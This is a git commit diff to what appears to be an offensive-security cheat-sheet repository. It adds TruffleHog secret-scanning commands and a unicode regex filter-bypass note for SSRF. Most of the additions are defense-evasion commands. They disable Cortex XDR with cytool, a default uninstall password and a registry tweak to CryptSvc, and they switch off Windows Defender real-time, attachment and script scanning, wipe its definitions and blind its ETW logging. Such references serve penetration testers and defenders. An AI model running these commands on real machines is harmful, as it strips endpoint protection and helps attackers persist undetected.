TruffleHog examples + Cortex XDR disable

RxXwx3x · Apr 14, 2022 · b0d05fa · b0d05fa
1 parent 9d07e04
commit b0d05fa
Show file tree

Hide file tree

Showing 4 changed files with 49 additions and 127 deletions.
diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
@@ -25,6 +25,13 @@
 
 - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
 - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
+- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
+    ```ps1
+    docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
+    docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
+    trufflehog git https://github.com/trufflesecurity/trufflehog.git
+    trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
+    ```
 
 ## Exploit
 

diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
@@ -64,6 +64,27 @@ PS> attrib +h mimikatz.exe
     Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
     Elastic Agent has been uninstalled.
     ```
+* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/)
+    ```ps1
+    # Global uninstall password: Password1
+    Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
+    Look for PasswordHash, PasswordSalt or password, salt strings.
+
+    # Disable Cortex: Change the DLL to a random value, then REBOOT
+    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
+
+    # Disables the agent on startup (requires reboot to work)
+    cytool.exe startup disable
+
+    # Disables protection on Cortex XDR files, processes, registry and services
+    cytool.exe protect disable
+
+    # Disables Cortex XDR (Even with tamper protection enabled)
+    cytool.exe runtime disable
+
+    # Disables event collection
+    cytool.exe event_collection disable
+    ```
 
 ### Disable Windows Defender
 
@@ -73,19 +94,30 @@ sc config WinDefend start= disabled
 sc stop WinDefend
 Set-MpPreference -DisableRealtimeMonitoring $true
 
-# Wipe currently stored definitions
-# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
-MpCmdRun.exe -RemoveDefinitions -All
-
 ## Exclude a process / location
 Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
 Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
 Add-MpPreference -ExclusionPath C:\Video, C:\install
 
+# Disable scanning all downloaded files and attachments, disable AMSI (reactive)
+PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
+PS C:\> Set-MpPreference -DisableIOAVProtection $true
+# Disable AMSI (set to 0 to enable)
+PS C:\> Set-MpPreference -DisableScriptScanning 1 
+
 # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
 reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
+
+# Wipe currently stored definitions
+# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
+MpCmdRun.exe -RemoveDefinitions -All
+
+# Remove signatures (if Internet connection is present, they will be downloaded again):
+PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
+PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
 ```
 
+
 ### Disable Windows Firewall
 
 ```powershell

diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
@@ -223,6 +223,12 @@ List:
 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 ```
 
+### Bypass using unicode
+
+In some languages (.NET, Python 3) regex supports unicode by default.
+`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`.
+
+
 ### Bypass filter_var() php function
 
 ```powershell